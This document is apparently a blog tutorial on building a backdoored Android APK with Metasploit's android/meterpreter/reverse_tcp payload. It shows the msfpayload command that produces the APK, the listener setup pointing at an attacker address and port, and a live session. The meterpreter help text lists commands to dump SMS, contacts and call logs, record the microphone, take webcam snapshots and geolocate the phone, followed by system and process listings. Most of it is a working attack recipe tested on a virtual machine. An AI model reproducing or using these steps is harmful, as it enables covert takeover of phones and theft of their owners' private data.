Metasploit - Android meterpreter

Create a malicious apk file

Create a malicious apk file (backdoor.apk), and raw is our format to output.

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 R > backdoor.apk

Install malicious apk file

For learning, I choose Android x86 Virtual Machine. Before apk is installed on the phone, we must set up a android meterpreter listener.

msf exploit(handler) > set payload android/meterpreter/reverse_tcp 
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (android/meterpreter/reverse_tcp):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   AutoLoadAndroid  true             yes       Automatically load the Android extension
   LHOST            192.168.1.108    yes       The listen address
   LPORT            4444             yes       The listen port
   RetryCount       10               yes       Number of trials to be made if connection failed


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.108:4444
[*] Starting the payload handler...
[*] Sending stage (44648 bytes) to 192.168.1.108
[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.108:41175) at 2015-02-23 16:56:32 +0000

meterpreter > help

Core Commands 
============= 

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Android Commands
================

    Command        Description
    -------        -----------
    check_root     Check if device is rooted
    dump_calllog   Get call log
    dump_contacts  Get contacts list
    dump_sms       Get sms messages
    geolocate      Get current lat-long using geolocation


meterpreter > sysinfo
Computer    : localhost
OS          : Android 4.4.2 - Linux 3.10.52-android-x86+ (i686)
Meterpreter : java/android
meterpreter > ps

Process List  
============  

 PID   Name                                            Arch  User
 ---   ----                                            ----  ----
 1     /init                                                 root
 2     kthreadd                                              root
 3     ksoftirqd/0                                           root
 5     kworker/0:0H                                          root
 6     kworker/u2:0                                          root
 7     migration/0                                           root
 8     rcu_preempt                                           root
 9     rcu_bh                                                root
 10    rcu_sched                                             root
 11    watchdog/0                                            root
 12    khelper                                               root
 295   writeback                                             root
 298   bioset                                                root
 299   crypto                                                root
 301   kblockd                                               root
 346   ata_sff                                               root
 353   khubd                                                 root
 462   kworker/0:1                                           root
 483   kswapd0                                               root
 484   fsnotify_mark                                         root
 521   kworker/u2:2                                          root
 660   scsi_eh_0                                             root
 672   scsi_eh_1                                             root
 675   scsi_eh_2                                             root
 728   kworker/0:2                                           root
 747   cfinteractive                                         root
 756   binder                                                root
 782   deferwq                                               root
 810   kworker/0:1H                                          root
 890   kpsmoused                                             root
 906   /sbin/v86d                                            root
 924   /sbin/ueventd                                         root
 1010  /system/bin/powerbtnd                                 root
 1011  /system/bin/sdcard                                    media_rw
 1014  /sbin/healthd                                         root
 1015  /system/bin/servicemanager                            system
1016  /system/bin/vold                                      root
 1017  /system/bin/netd                                      root
 1018  /system/bin/debuggerd                                 root
 1019  /system/bin/rild                                      radio
 1020  /system/bin/surfaceflinger                            root
 1021  zygote                                                root
 1022  /system/bin/drmserver                                 drm
 1023  /system/bin/mediaserver                               media
 1024  /system/bin/installd                                  install
 1025  /system/bin/keystore                                  keystore
 1026  /system/bin/sh                                        root
 1027  /system/bin/sh                                        root
 1040  /system/xbin/su                                       root
 1041  /sbin/adbd                                            shell
 1335  system_server                                         system
 1380  /system/bin/dhcpcd                                    dhcp
 1425  com.android.systemui                                  u0_a11
 1503  com.google.android.inputmethod.latin                  u0_a48
 1517  com.google.android.gms                                u0_a8
 1530  com.android.phone                                     radio
 1536  com.cyanogenmod.trebuchet                             u0_a19
 1662  com.google.process.gapps                              u0_a8
 1688  com.google.process.location                           u0_a8
 1929  com.google.android.partnersetup                       u0_a10
 2097  com.android.vending                                   u0_a15
 2129  com.thirdparty.superuser                              system
 2143  com.google.android.googlequicksearchbox:search        u0_a20
 2220  com.android.deskclock                                 u0_a34
 2311  android.process.acore                                 u0_a3
 2663  com.android.packageinstaller                          u0_a58
 2677  com.android.defcontainer                              u0_a4
 2696  com.android.musicfx                                   u0_a13
 2716  com.google.android.apps.docs                          u0_a37
 2736  com.android.gallery3d                                 u0_a42
 2757  com.svox.pico                                         u0_a60
 2825  android.process.media                                 u0_a6
 3361  com.android.settings                                  system
 3391  com.google.android.gms.drive                          u0_a8
 3414  com.google.android.gms.wearable                       u0_a8
 3441  com.android.keychain                                  system
 3457  com.android.documentsui                               u0_a36
 3473  com.android.externalstorage                           u0_a7
3781  com.zmappsh                                           u0_a75
 3813  com.zmappsh:bdservice_v1                              u0_a75
 3930  jackpal.androidterm                                   u0_a23
 3944  /system/bin/sh                                        u0_a23
 4106  lysesoft.andftp                                       u0_a79
 4225  com.cyanogenmod.filemanager                           u0_a28
 4240  /system/bin/sh                                        u0_a28
 4250  /system/bin/sh                                        u0_a28
 4324  com.metasploit.stage                                  u0_a80
 4372  wget                                                  root
 4380  sh                                                    u0_a80
 4381  ps                                                    u0_a80

Notices

When I install apk file on the phone (Tencent Security Software is installed.), it show me “App not installed“.

References:

[1].http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit
[2].https://community.rapid7.com/thread/4672

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值